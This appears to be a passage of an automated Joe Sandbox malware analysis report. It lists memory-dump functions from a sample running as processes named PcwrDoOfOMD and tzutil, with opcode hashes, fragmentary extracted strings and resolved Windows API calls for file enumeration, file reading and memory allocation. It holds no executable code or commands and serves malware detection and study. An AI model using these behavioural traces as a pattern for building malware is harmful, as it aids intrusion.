                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                                    • Instruction ID: dc8449f29cb0030a5392eb5508df6a5a6c0ad79368f4d7372fba565dbfd18033
                                                                    • Opcode Fuzzy Hash: b126ddd99a82b0e6a5761decd8d6853ac45a813b476234a54d0b7561d2c41cb1
                                                                    • Instruction Fuzzy Hash: BD01E9B6C0121DAFCB40DFE8D9409EEBBF8AB48300F14426AD519F7240F7706A048FA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b773f3045ef178b27cc8625d8d0c61f63d74ef87bfe85eda7fcfbd899e03fc3
                                                                    • Instruction ID: ca32deef59c98a8d9a9471c72c49f8672c4b7a6d6e263fc58770d4301861b6bd
                                                                    • Opcode Fuzzy Hash: 7b773f3045ef178b27cc8625d8d0c61f63d74ef87bfe85eda7fcfbd899e03fc3
                                                                    • Instruction Fuzzy Hash: 2FF0B4736002165BE7206FADAC44B96B7DCEB84325F244227E91D9B2A1D732A8528690
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                                    • Instruction ID: da11161dfcffa5aa7b09c604477e0cef384f796e5c42dbd6d34f507c6ee1efcf
                                                                    • Opcode Fuzzy Hash: 75cd10afc6497bc7a15310c65ed230a475c283ab31228889cdcd35a57f93b811
                                                                    • Instruction Fuzzy Hash: 2DF07871C04294AEDB01EBA0CC48AFFBF74DF89319F0401C9D0082B151E630A98BC765
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                                    • Instruction ID: f3a27e5bc451dba3a04ee92547acb609c3b264ad4ebd0a2620740b434048de86
                                                                    • Opcode Fuzzy Hash: 17a7bc8f7d8520c4bffdc9816d876c5e0740f6373924b595003b5f186f1b3574
                                                                    • Instruction Fuzzy Hash: BBF015B6200209BBDB10EF89DC81EAB77ACEFC8714F004019BE08A7241D670B9218BF0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction ID: 5a3dfe6dce30207d41b9087a45d5cfb6b5b6499ee5bbbd584a9ccd4564d8e813
                                                                    • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                                    • Instruction Fuzzy Hash: C7E09A722042087BDA14EF59DC80E9B37ACEFC8710F000408FA08A7240DA31B9118BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                    • Instruction ID: 4f5724d16b9343ca1e2e589bfca40d6f3f6879e2197b858450d047ecdb1834b0
                                                                    • Opcode Fuzzy Hash: bda29215af404e63ea5841a5bf47159a533bd7fbcf7b6c61d1dc4e162ad7e555
                                                                    • Instruction Fuzzy Hash: FBF08271C15209EBDB14DFA4D841BDEBBB4EB04320F104369E8249B280E634A7519B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                                    • Instruction ID: 27ce1c4af2fafebdfa913584d2171ccdc74045f22e5c34d3104f696302fbda00
                                                                    • Opcode Fuzzy Hash: 0a49911327731111d187c10d9df807f6481cb23bdff532a9ce64d2e3ccaf779b
                                                                    • Instruction Fuzzy Hash: 70E08C36E4032477E220A9899C06F9BB76CDFC5E72F150028FE089B340E560F90282F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                                    • Instruction ID: 06ff85bc42e4461fe2a77b059b8514b216b82f143db3adcb7b1e89cf53d79b4b
                                                                    • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                                    • Instruction Fuzzy Hash: EBE08C36200604BBE620FB59DC40E9BBB6CEFC6725F004015FA49A7240C670B9158BB0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 509f23a4164d918a7bed28faba1de9b67ef3dac0b22671988f2c0615dca0da36
                                                                    • Instruction ID: fe45511ffdac3e55a3ce87419786fe4239403bb1e1898218d0531048be9f0953
                                                                    • Opcode Fuzzy Hash: 509f23a4164d918a7bed28faba1de9b67ef3dac0b22671988f2c0615dca0da36
                                                                    • Instruction Fuzzy Hash:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                    • API String ID: 0-1002149817
                                                                    • Opcode ID: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                                    • Instruction ID: cd82c3cb6a9f5038b4302364b2239ebc97168fa09939185ff525733fe16f16dc
                                                                    • Opcode Fuzzy Hash: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                                    • Instruction Fuzzy Hash: 94C12FB1D00228AEEF20DFA4CD44BDEBBB9AF45304F1081D9D548AB241E7B55A89CF65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$PP$Qt$V$`J$c6$f$m$o$v>$x$y$}$,$>$_
                                                                    • API String ID: 0-4064015928
                                                                    • Opcode ID: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                                    • Instruction ID: 2e81aca95ab85caf580affc6ef44079c2e17fbadf4c46d8b99b49cf6f15e8b59
                                                                    • Opcode Fuzzy Hash: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                                    • Instruction Fuzzy Hash: A1A178B0D05669CBFB61CF81C9587CEBBB1BB45308F1081D9C55C2B291C7BA1A89CF91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                    • API String ID: 0-392141074
                                                                    • Opcode ID: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                                    • Instruction ID: da04d033a3a88a100d09cb01ac2d9597c7bd957eebce3349ee4554c77362d3c3
                                                                    • Opcode Fuzzy Hash: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                                    • Instruction Fuzzy Hash: 7D712CB1C1422CAAEB25DFA4CC41FEFB778BF08704F044199E518A6140EB756B498FA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                    • API String ID: 0-392141074
                                                                    • Opcode ID: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                                    • Instruction ID: 763031217a8d8a20e6a85b4320a44b2f89974978fb7663eba17e510bedb6ffbc
                                                                    • Opcode Fuzzy Hash: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                                    • Instruction Fuzzy Hash: 75613DB1C1422CAAEB15DFA4CC81FEFB778BF08704F14419DE519A6180EB716B498F65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                    • API String ID: 0-685823316
                                                                    • Opcode ID: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                                    • Instruction ID: 304e3a6ae4ff609b378ba23a539d56fdf9a2d41a00fa5e125795f5f6c591c60d
                                                                    • Opcode Fuzzy Hash: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                                    • Instruction Fuzzy Hash: 573178B1D11218AEEF50DFD4CC45FEE77B9AF08704F10415CE618B6180DBB566488BA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$P$e$i$m$o$r$x
                                                                    • API String ID: 0-620024284
                                                                    • Opcode ID: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                                    • Instruction ID: 79d2d5a89f78cb7e66f9ede66c57cffdaed996161d810160a75c5dab6de46c3c
                                                                    • Opcode Fuzzy Hash: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                                    • Instruction Fuzzy Hash: 464183B6D10218BAEB20EFA4CC41FEF777CAF54305F008599A509A7141EAB5A7498FA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4$XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                                    • API String ID: 0-2821098887
                                                                    • Opcode ID: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                                    • Instruction ID: 0da6970d9f5f2f9364941cce017a1d156975683c794865c8b39ff2493338d698
                                                                    • Opcode Fuzzy Hash: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                                    • Instruction Fuzzy Hash: D631DBB0C0129CAADB14CFA5DA8868DBFB0FB05789F608658C42A7F250D7318A46CF16
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$9$E$\$]$k$v${
                                                                    • API String ID: 0-2353787348
                                                                    • Opcode ID: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                                    • Instruction ID: 933157b16566c0fd6183f4fc2315a8b1f54a3769fdac8637b8db90fba4f9cfed
                                                                    • Opcode Fuzzy Hash: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                                    • Instruction Fuzzy Hash: 1911DB10D087CED9DB12C7BC88186AEBF715F23224F0882D9D4E52B2D2D2795746D7A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L$S$\$a$c$e$l
                                                                    • API String ID: 0-3322591375
                                                                    • Opcode ID: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                                    • Instruction ID: 7ddd30cbfd564f6942ac11b5d996558bbb69c0392a26885bb0e62f02489eb1d5
                                                                    • Opcode Fuzzy Hash: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                                    • Instruction Fuzzy Hash: FF4188B2C14218AFDB50DF94DC85FEFB7F9EF48315F05425AD909A7100E771AA458BA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F$P$T$f$r$x
                                                                    • API String ID: 0-2523166886
                                                                    • Opcode ID: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                                    • Instruction ID: acbf161409d84f17f92b3776658db63717d80656b8eb4ad6d7350faa7c9a1960
                                                                    • Opcode Fuzzy Hash: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                                    • Instruction Fuzzy Hash: D051C171D04715ABEB34DFA4CD48BEBB3B8EF04709F14095DE509A6280E7B4B646CBA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $i$l$o$u
                                                                    • API String ID: 0-2051669658
                                                                    • Opcode ID: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                                    • Instruction ID: 82c6dc38995ae2790cf33c46518d0ec26b7357c80a2710798aaf1d90444f90bb
                                                                    • Opcode Fuzzy Hash: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                                    • Instruction Fuzzy Hash: D4615DB1900714AFDB24DFA4CC80FEFB7F8AB48704F204558E519A7240EA35BA46CB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                    • API String ID: 0-1319493415
                                                                    • Opcode ID: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                                    • Instruction ID: df27efb6303ffa9423ba568bb2bd7178efb53dce887f352a56089d07d3fff170
                                                                    • Opcode Fuzzy Hash: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                                    • Instruction Fuzzy Hash: 1D413BB19512197EFB12EF90CC42FFF777CAF95605F004148F604AA180EAB4761687BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                    • API String ID: 0-1319493415
                                                                    • Opcode ID: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                                    • Instruction ID: 0e976cab059db12da3f8f028caa2fe4d890320543613d627327707cb2c4efc8f
                                                                    • Opcode Fuzzy Hash: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                                    • Instruction Fuzzy Hash: 50310BB1911119BEFB12EF90CC42FEF777CAF95605F004049FA04AA180EB747A1687BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$k$o
                                                                    • API String ID: 0-3624523832
                                                                    • Opcode ID: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                                    • Instruction ID: 098163a7f335c518188a9222b409b296fd292e02842a609cd17a7f13625e1154
                                                                    • Opcode Fuzzy Hash: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                                    • Instruction Fuzzy Hash: B7B10CB5A00704AFDB24DFE4CD85FEFB7B9AF88704F208558F619A7240DA75AA41CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$h$o
                                                                    • API String ID: 0-3662636641
                                                                    • Opcode ID: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                                    • Instruction ID: 4c1c4a32b4327507bc808e6931263577f0bb332fa76f3d3b923e141f043b4097
                                                                    • Opcode Fuzzy Hash: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                                    • Instruction Fuzzy Hash: AA8186B2C00259BAEB25EB90CD85FEFB37DEF48204F0041DAE509A6145EB747B458FA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$k$o
                                                                    • API String ID: 0-3624523832
                                                                    • Opcode ID: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                                    • Instruction ID: b445a87bf979f23f439ea0f268298edc159661f2f199b41389c2260c8772f4e7
                                                                    • Opcode Fuzzy Hash: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                                    • Instruction Fuzzy Hash: 61612175A00708AFDB54DFA4CC84FEFB7BDAF88704F104558E65997244DB71AA41CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$h$o
                                                                    • API String ID: 0-3662636641
                                                                    • Opcode ID: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                                    • Instruction ID: 939569cb194982379650af1484163ac4e9b7d2ebe7700a453b8d3ddc7af12a60
                                                                    • Opcode Fuzzy Hash: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                                    • Instruction Fuzzy Hash: 594193B1C01359AAEB10EFA4CD45FEFB3B9EF48304F1041DAA20DA6145EB746B458FA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$U$g$r
                                                                    • API String ID: 0-389700855
                                                                    • Opcode ID: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                                    • Instruction ID: c1e6b07111ebcc0356b4fc2cd45d6a979771dc9441af3cc0ef2444070c7705ff
                                                                    • Opcode Fuzzy Hash: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                                    • Instruction Fuzzy Hash: B03132B1E10119BBEB14DFA4DD41FEF77B8EF05308F004198E908A7280EB75AA458BE5

                                                                    Execution Graph

                                                                    Execution Coverage:2.4%
                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                    Signature Coverage:2.3%
                                                                    Total number of Nodes:439
                                                                    Total number of Limit Nodes:71

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                                    • API String ID: 0-3230942322
                                                                    • Opcode ID: 36614b9eb27887eba215152c997524aed3941c8cea6b7e39a2ee495c72944b75
                                                                    • Instruction ID: baa5347386a0f607f00b5ed8985f39a3238533d87205aef5ac7152017d3eb7cb
                                                                    • Opcode Fuzzy Hash: 36614b9eb27887eba215152c997524aed3941c8cea6b7e39a2ee495c72944b75
                                                                    • Instruction Fuzzy Hash: 31329DB8E0562CCBEB29CF54C8947DDBBB2BF45308F5081D9D04AAA381C7B55A89CF45
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 028CCAB1
• FindNextFileW.KERNELBASE(?,00000010), ref: 028CCAEE
• FindClose.KERNELBASE(?), ref: 028CCAF9
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
• Instruction ID: 9a3aeb8c2efc74b8fef9f1c800b6f5f6d71d928411d728b4a3611777e02ec60f
• Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
• Instruction Fuzzy Hash: 353160BA9002487BDB20DB64CC89FEF777D9F44749F14455DB90CEA180DBB0AA858BA1
APIs
• NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 028D957B
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
• Instruction ID: b4e49afea27fd11229bc5fbae441694f4ddf8e0b6d960ae868b5c10896071758
• Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
• Instruction Fuzzy Hash: 4031C2B9A01248AFCB54DF98D880EEEB7F9EF88304F108119F918A7340D770A955CFA5
APIs
• NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 028D96D6
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
• Instruction ID: 9b38e027e797ea16f7c491a67e6c0809d9efcec3afab5ab3a3f523e3a59e91ad
• Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
• Instruction Fuzzy Hash: E031C7B9A00248AFCB14DF98D840EEFB7F9EF88714F108219F958A7340D674A911CFA5
APIs
• NtAllocateVirtualMemory.NTDLL(028C21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,028D82FF,028C21AE), ref: 028D99A8
Memory Dump Source
• Source File: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_28b0000_tzutil.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
• Instruction ID: 0bf779b8b77657bc6c7e6d603958a5673e6dc99de38351a525468d11b6a38024
